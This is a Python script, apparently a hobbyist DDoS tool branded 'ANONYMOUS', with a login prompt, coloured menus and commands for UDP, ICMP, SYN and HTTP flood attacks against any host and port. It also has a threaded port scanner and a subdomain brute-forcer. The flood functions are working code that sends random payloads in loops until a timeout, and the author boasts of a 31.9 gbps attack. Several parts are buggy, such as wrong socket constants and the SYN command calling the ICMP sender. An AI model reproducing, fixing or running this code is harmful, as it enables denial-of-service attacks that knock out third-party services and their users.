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- #!/usr/bin/env python3
- #-*- coding: utf-8 -*-
- import sys
- import socket
- import time
- import random
- import threading
- import getpass
- import os
- sys.stdout.write("\x1b]2;A N O N Y M O U S |ANON| D E M O N S\x07")
- def modifications():
- print ("Contact Misfortune or Reaper the script is currently under maitnance")
- on_enter = input("Please press enter to leave")
- exit()
- #column:65
- method = """\033[91m
- ╔════════════════════════════════════════════════════════════╗
- ║ \033[00mDDoS \033[91m ║
- ╔═╝════════════════════════════════════════════════════════════╚═╗
- ║ \033[00mUDP \033[91m<\033[00mHOST\033[91m> <\033[00mPORT\033[91m> <\033[00mTIMEOUT\033[91m> <\033[00mSIZE\033[91m> | \033[00mUDP ATTACK \033[91m ║
- ║ \033[00mICMP \033[91m<\033[00mHOST\033[91m> <\033[00mPORT\033[91m> <\033[00mTIMEOUT\033[91m> <\033[00mSIZE\033[91m> | \033[00mICMP ATTACK \033[91m ║
- ║ \033[00mSYN \033[91m<\033[00mHOST\033[91m> <\033[00mPORT\033[91m> <\033[00mTIMEOUT\033[91m> <\033[00mSIZE\033[91m> | \033[00mSYN ATTACK \033[91m ║
- ║ \033[00mHTTP \033[91m<\033[00mHOST\033[91m> <\033[00mPORT\033[91m> <\033[00mTIMEOUT\033[91m> <\033[00mSIZE\033[91m> | \033[00mHTTP ATTACK \033[91m ║
- ╚═╗════════════════════════════════════════════════════════════╔═╝
- ║ \033[00mMETHODS \033[91m ║
- ╚════════════════════════════════════════════════════════════╝\033[00m
- """
- info = """
- [\033[91mA N O N\033[00m] \033[91mMade By reaper, most credit goes to a freind of mines whom taught me python
- Most/Everything im available to do today is mainly for that freind kicking me into it so big thanks.
- Bigest attack: 31.9 gbps
- """
- version = "3.2"
- help = """\033[91m
- ╔═══════════════════════════════════════╗
- ║ \033[00mHELP \033[91m ║
- ╔═╝═══════════════════════════════════════╚═╗
- ║\033[00m Clear \033[91m | \033[00mCLEAR SCREEN \033[91m ║
- ║\033[00m Exit \033[91m | \033[00mEXIT SINFULL \033[91m ║
- ║\033[00m Methods \033[91m | \033[00mSINS METHODS \033[91m ║
- ║\033[00m Tools \033[91m | \033[00mBASIC TOOLS \033[91m ║
- ║\033[00m Updates \033[91m | \033[00mDISPLAY UPDATE NOTES \033[91m ║
- ║\033[00m Info \033[91m | \033[00mDISPLAY SINFULLS INFO \033[91m ║
- ╚═╗═══════════════════════════════════════╔═╝
- ║ \033[00m COMMANDS \033[91m ║
- ╚═══════════════════════════════════════╝\033[00m
- """
- tools = """\033[91m
- ╔════════════════════════════════════════════════╗
- ║ \033[00mTOOLS \033[91m ║
- ╔═╝════════════════════════════════════════════════╚═╗
- ║ \033[00mStopattacks \033[91m| \033[00mSTOP ALL ATTACKS \033[91m║
- ║ \033[00mAttacks \033[91m| \033[00mRUNNING ATTACKS \033[91m║
- ║ \033[00mPing <HOST> \033[91m| \033[00mPING A HOST \033[91m║
- ║ \033[00mResolve <HOST> \033[91m| \033[00mGRAB A DOMIANS IP \033[91m║
- ║ \033[00mPortscan <HOST> <RANGE> \033[91m| \033[00mPORTSCAN A HOST \033[91m║
- ║ \033[00mDnsresolve <HOST> \033[91m| \033[00mGRAB ALL SUB-DOMAINS \033[91m║
- ║ \033[00mStats \033[91m| \033[00mDISPLAY SINFULL STATS \033[91m║
- ╚═╗════════════════════════════════════════════════╔═╝
- ║ \033[00mCOMMANDS \033[91m║
- ╚════════════════════════════════════════════════╝\033[00m
- """
- updatenotes = """\033[91m
- ╔════════════════════════════════════════════════╗
- ║ \033[00mUPDATE \033[91m ║
- ╔═╝════════════════════════════════════════════════╚═╗
- ║ \033[91m> \033[00mBetter ascii menu \033[91m ║
- ║ \033[91m> \033[00mUpdated command casing no longer only capital \033[91m ║
- ║ \033[91m> \033[00mUpdated attack methods \033[91m ║
- ║ \033[91m> \033[00mTimeout bug fixed \033[91m ║
- ║ \033[91m> \033[00mBackground attacks \033[91m ║
- ║ \033[91m> \033[00mRunning task displayer \033[91m ║
- ║ \033[91m> \033[00mAll tools fixed and working \033[91m ║
- ╚═╗════════════════════════════════════════════════╔═╝
- ║ \033[00m NOTES \033[91m ║
- ╚════════════════════════════════════════════════╝\033[00m
- """
- statz = """
- ║ \033[00mSTATS\033[91m ║
- \033[00m- Attacks: \033[91m{}
- \033[00m- Found Domains: \033[91m{}
- \033[00m- PINGS: \033[91m{}
- \033[00m- PORTSCANS: \033[91m{}
- \033[00m- GRABBED IPS: \033[91m{}
- ╚══════════════════════════════════════════════════════╝\033[00m"""
- banner = """\033[1;00m
- \033[91m █████\033[00m╗ \033[91m███\033[00m╗ \033[91m██\033[00m╗ \033[91m██████\033[00m╗ \033[91m███\033[00m╗ \033[91m██\033[00m╗\033[91m██\033[00m╗ \033[91m██\033[00m╗\033[91m███\033[00m╗ \033[91m ███\033[00m╗ \033[91m██████\033[00m╗ \033[91m██\033[00m╗ \033[91m ██\033[00m╗\033[91m███████\033[00m╗
- \033[91m██\033[00m╔══\033[91m██\033[00m╗\033[91m████\033[00m╗ \033[91m██\033[00m║\033[91m██\033[00m╔═══\033[91m██\033[00m╗\033[91m████\033[00m╗ \033[91m██\033[00m║╚\033[91m██\033[00m╗ \033[91m██\033[00m╔╝\033[91m████\033[00m╗ \033[91m████\033[00m║\033[91m██\033[00m╔═══\033[91m██\033[00m╗\033[91m██\033[00m║ \033[91m██\033[00m║\033[91m██\033[00m╔════╝
- \033[91m███████\033[00m║\033[91m██\033[00m╔\033[91m██\033[00m╗ \033[91m██\033[00m║\033[91m██\033[00m║ \033[91m██\033[00m║\033[91m██\033[00m╔\033[91m██\033[00m╗\033[91m ██\033[00m║ ╚\033[91m████\033[00m╔╝\033[91m ██\033[00m╔\033[91m████\033[00m╔\033[91m██\033[00m║\033[91m██\033[00m║ \033[91m██\033[00m║\033[91m██\033[00m║ \033[91m██\033[00m║\033[91m███████\033[00m╗
- \033[91m██\033[00m╔══\033[91m██\033[00m║\033[91m██\033[00m║╚\033[91m██\033[00m╗\033[91m██\033[00m║\033[91m██\033[00m║ \033[91m██\033[00m║\033[91m██\033[00m║╚\033[91m██\033[00m╗\033[91m██\033[00m║ ╚\033[91m██\033[00m╔╝ \033[91m ██\033[00m║╚\033[91m██\033[00m╔╝\033[91m██\033[00m║\033[91m██\033[00m║ \033[91m██\033[00m║\033[91m██\033[00m║ \033[91m██\033[00m║╚════\033[91m██\033[00m║
- \033[91m██\033[00m║ \033[91m██\033[00m║\033[91m██\033[00m║ ╚\033[91m████\033[00m║╚\033[91m██████\033[00m╔╝\033[91m██\033[00m║ ╚\033[91m████\033[00m║ \033[91m██\033[00m║ \033[91m██\033[00m║ ╚═╝ \033[91m██\033[00m║╚\033[91m██████\033[00m╔╝╚\033[91m██████\033[00m╔╝\033[91m███████\033[00m║
- \033[00m╚═╝ ╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝
- \033[1;91m 匿名
- """
- altbanner = """
- Angels go to heaven
- Demons meet the gates of hell
- Sinfull people are punished put in hell
- A N O N Y M O U S
- """
- cookie = open(".ANONYMOUS_cookie","w+")
- fsubs = 0
- tpings = 0
- pscans = 0
- liips = 0
- tattacks = 0
- uaid = 0
- said = 0
- iaid = 0
- haid = 0
- aid = 0
- attack = True
- http = True
- udp = True
- syn = True
- icmp = True
- def synsender(host, port, timer, punch):
- global said
- global syn
- global aid
- global tattacks
- timeout = time.time() + float(timer)
- sock = socket.socket (socket.AF_INET, socket.SOCK_RAW, socket.TCP_SYNCNT)
- said += 1
- tattacks += 1
- aid += 1
- while time.time() < timeout and syn and attack:
- sock.sendto(punch, (host, int(port)))
- said -= 1
- aid -= 1
- def udpsender(host, port, timer, punch):
- global uaid
- global udp
- global aid
- global tattacks
- timeout = time.time() + float(timer)
- sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- uaid += 1
- aid += 1
- tattacks += 1
- while time.time() < timeout and udp and attack:
- sock.sendto(punch, (host, int(port)))
- uaid -= 1
- aid -= 1
- def icmpsender(host, port, timer, punch):
- global iaid
- global icmp
- global aid
- global tattacks
- timeout = time.time() + float(timer)
- sock = socket.socket(socket.AF_INET, socket.IPPROTO_IGMP)
- iaid += 1
- aid += 1
- tattacks += 1
- while time.time() < timeout and icmp and attack:
- sock.sendto(punch, (host, int(port)))
- iaid -= 1
- aid -= 1
- def httpsender(host, port, timer, punch):
- global haid
- global http
- global aid
- global tattacks
- timeout = time.time() + float(timer)
- haid += 1
- aid += 1
- tattacks += 1
- while time.time() < timeout and icmp and attack:
- try:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.sendto(punch, (host, int(port)))
- sock.close()
- except socket.error:
- pass
- haid -= 1
- aid -= 1
- def main():
- global fsubs
- global tpings
- global pscans
- global liips
- global tattacks
- global uaid
- global said
- global iaid
- global haid
- global aid
- global attack
- global dp
- global syn
- global icmp
- global http
- while True:
- sys.stdout.write("\x1b]2;A N O N Y M O U S\x07")
- sin = input("\033[1;00m[\033[91mA N O N Y M O U S\033[1;00m]-\033[91m家\033[00m ").lower()
- sinput = sin.split(" ")[0]
- if sinput == "clear":
- os.system ("clear")
- print (altbanner)
- main()
- elif sinput == "help":
- print (help)
- main()
- elif sinput == "":
- main()
- elif sinput == "exit":
- exit()
- elif sinput == "version":
- print ("ANONYMOUS version: "+version+" ")
- elif sinput == "stats":
- print ("\033[00m- Attacks: \033[91m{} ".format (tattacks))
- print ("\033[00m- Found Domains: \033[91m{} ".format(fsubs))
- print ("\033[00m- PINGS: \033[91m{} ".format(tpings))
- print ("\033[00m- PORTSCANS: \033[91m{} ".format(pscans))
- print ("\033[00m- GRABBED IPS: \033[91m{}\n ".format(liips))
- main()
- elif sinput == "methods":
- print (method)
- main()
- elif sinput == "tools":
- print (tools)
- main()
- elif sinput == "portscan":
- port_range = int(sin.split(" ")[2])
- pscans += 1
- def scan(port, ip):
- try:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect((ip, port))
- print ("[\033[91mA N O N\033[00m] {}\033[91m:\033[00m{} [\033[91mOPEN\033[00m]".format (ip, port))
- sock.close()
- except socket.error:
- return
- except KeyboardInterrupt:
- print ("\n")
- for port in range(1, port_range+1):
- ip = socket.gethostbyname(sin.split(" ")[1])
- threading.Thread(target=scan, args=(port, ip)).start()
- elif sinput == "updates":
- print (updatenotes)
- main()
- elif sinput == "info":
- print (info)
- main()
- elif sinput == "attacks":
- print ("\n[\033[91mA N O N\033[00m] UPD Running processes: {}".format (uaid))
- print ("[\033[91mA N O N\033[00m] ICMP Running processes: {}".format (iaid))
- print ("[\033[91mA N O N\033[00m] SYN Running processes: {}".format (said))
- print ("[\033[91mA N O N\033[00m] Total attacks running: {}\n".format (aid))
- main()
- elif sinput == "dnsresolve":
- sfound = 0
- sys.stdout.write("\x1b]2;A N O N Y M O U S |{}| F O U N D\x07".format (sfound))
- try:
- host = sin.split(" ")[1]
- with open(r"/usr/share/sinfull/subnames.txt", "r") as sub:
- domains = sub.readlines()
- for link in domains:
- try:
- url = link.strip() + "." + host
- subips = socket.gethostbyname(url)
- print ("[\033[91mA N O N\033[00m] Domain: https://{} \033[91m>\033[00m Converted: {} [\033[91mEXISTANT\033[00m]".format(url, subips))
- sfound += 1
- fsubs += 1
- sys.stdout.write("\x1b]2;AN O N Y M O U S |{}| F O U N D\x07".format (sfound))
- except socket.error:
- pass
- #print ("[\033[91mA N O N\033[00m] Domain: {} [\033[91mNON-EXISTANT\033[00m]".format(url))
- print ("[\033[91mA N O N\033[00m] Task complete | found: {}".format(sfound))
- main()
- except IndexError:
- print ('ADD THE HOST!')
- elif sinput == "resolve":
- liips += 1
- host = sin.split(" ")[1]
- host_ip = socket.gethostbyname(host)
- print ("[\033[91mA N O N\033[00m] Host: {} \033[00m[\033[91mConverted\033[00m] {}".format (host, host_ip))
- main()
- elif sinput == "ping":
- tpings += 1
- try:
- sinput, host, port = sin.split(" ")
- print ("[\033[91mA N O N\033[00m] Starting ping on host: {}".format (host))
- try:
- ip = socket.gethostbyname(host)
- except socket.gaierror:
- print ("[\033[91mA N O N\033[00m] Host un-resolvable")
- main()
- while True:
- try:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.settimeout(2)
- start = time.time() * 1000
- sock.connect ((host, int(port)))
- stop = int(time.time() * 1000 - start)
- sys.stdout.write("\x1b]2;A N O N Y M O U S |{}ms| D E M O N S\x07".format (stop))
- print ("ANONYMOUS: {}:{} | Time: {}ms [\033[91mUP\033[00m]".format(ip, port, stop))
- sock.close()
- time.sleep(1)
- except socket.error:
- sys.stdout.write("\x1b]2;A N O N Y M O U S |TIME OUT| D E M O N S\x07")
- print ("ANONYMOUS: {}:{} [\033[91mDOWN\033[00m]".format(ip, port))
- time.sleep(1)
- except KeyboardInterrupt:
- print("")
- main()
- except ValueError:
- print ("[\033[91mA N O N\033[00m] The command {} requires an argument".format (sinput))
- main()
- elif sinput == "udp":
- if username == "guests":
- print ("[\033[91mA N O N\033[00m] You are not allowed to use this method")
- main()
- else:
- try:
- sinput, host, port, timer, pack = sin.split(" ")
- socket.gethostbyname(host)
- print ("Attack sent to: {}".format (host))
- punch = random._urandom(int(pack))
- threading.Thread(target=udpsender, args=(host, port, timer, punch)).start()
- except ValueError:
- print ("[\033[91mA N O N\033[00m] The command {} requires an argument".format (sinput))
- main()
- except socket.gaierror:
- print ("[\033[91mA N O N\033[00m] Host: {} invalid".format (host))
- main()
- elif sinput == "http":
- try:
- sinput, host, port, timer, pack = sin.split(" ")
- socket.gethostbyname(host)
- print ("Attack sent to: {}".format (host))
- punch = random._urandom(int(pack))
- threading.Thread(target=httpsender, args=(host, port, timer, punch)).start()
- except ValueError:
- print ("[\033[91mA N O N\033[00m] The command {} requires an argument".format (sinput))
- main()
- except socket.gaierror:
- print ("[\033[91mA N O N\033[00m] Host: {} invalid".format (host))
- main()
- elif sinput == "icmp":
- if username == "guests":
- print ("[\033[91mA N O N\033[00m] You are not allowed to use this method")
- main()
- else:
- try:
- sinput, host, port, timer, pack = sin.split(" ")
- socket.gethostbyname(host)
- print ("Attack sent to: {}".format (host))
- punch = random._urandom(int(pack))
- threading.Thread(target=icmpsender, args=(host, port, timer, punch)).start()
- except ValueError:
- print ("[\033[91mA N O N\033[00m] The command {} requires an argument".format (sinput))
- main()
- except socket.gaierror:
- print ("[\033[91mA N O N\033[00m] Host: {} invalid".format (host))
- main()
- elif sinput == "syn":
- try:
- sinput, host, port, timer, pack = sin.split(" ")
- socket.gethostbyname(host)
- print ("Attack sent to: {}".format (host))
- punch = random._urandom(int(pack))
- threading.Thread(target=icmpsender, args=(host, port, timer, punch)).start()
- except ValueError:
- print ("[\033[91mA N O N\033[00m] The command {} requires an argument".format (sinput))
- main()
- except socket.gaierror:
- print ("[\033[91mA N O N\033[00m] Host: {} invalid".format (host))
- main()
- elif sinput == "stopattacks":
- attack = False
- while not attack:
- if aid == 0:
- attack = True
- elif sinput == "stop":
- what = sin.split(" ")[1]
- if what == "udp":
- print ("Stoping all udp attacks")
- udp = False
- while not udp:
- if aid == 0:
- print ("[\033[91mA N O N\033[00m] No udp Processes running.")
- udp = True
- main()
- if what == "icmp":
- print ("Stopping all icmp attacks")
- icmp = False
- while not icmp:
- print ("[\033[91mA N O N\033[00m] No ICMP processes running")
- udp = True
- main()
- else:
- print ("[\033[91mA N O N\033[00m] {} Command NotFound".format(sinput))
- main()
- try:
- users = ["anon", "guests"]
- clear = "clear"
- os.system (clear)
- username = getpass.getpass ("ツ \033[91m❤ \033[00mThe Username Is (\033[91manon\033[00m)\033[00m-\033[91m频\033[00m ")
- if username in users:
- user = username
- else:
- print ("ツ \033[91mIncorrect\033[00m, \033[91mExiting Script\033[00m...")
- exit()
- except KeyboardInterrupt:
- print ("\nCTRL-C Pressed")
- exit()
- try:
- passwords = ["skid", "gayman"]
- password = getpass.getpass ("ツ \033[91m❤ \033[00mThe Password Is (\033[91mskid\033[00m)\033[00m-\033[91m频\033[00m ")
- if user == "anon":
- if password == passwords[0]:
- print ("ツ \033[91m❤ \033[00m Login Successful")
- cookie.write("DIE")
- time.sleep(2)
- os.system (clear)
- try:
- os.system ("clear")
- print (banner)
- main()
- except KeyboardInterrupt:
- print ("\n[\033[91mA N O N\033[00m] CTRL has been pressed")
- main()
- else:
- print ("ツ \033[91mIncorrect\033[00m, \033[91mExiting Script\033[00m...")
- exit()
- if user == "guests":
- if password == passwords[1]:
- print ("ツ \033[91m❤ \033[00m Login Successful")
- print ("ツ \033[91m❤ \033[00m Certain methods will not be available to you")
- time.sleep(4)
- os.system (clear)
- try:
- os.system ("clear")
- print (banner)
- main()
- except KeyboardInterrupt:
- print ("\n[\033[91mA N O N\033[00m] CTRL has been pressed")
- main()
- else:
- print ("ツ \033[91mIncorrect\033[00m, \033[91mExiting Script\033[00m...")
- exit()
- except KeyboardInterrupt:
- exit()
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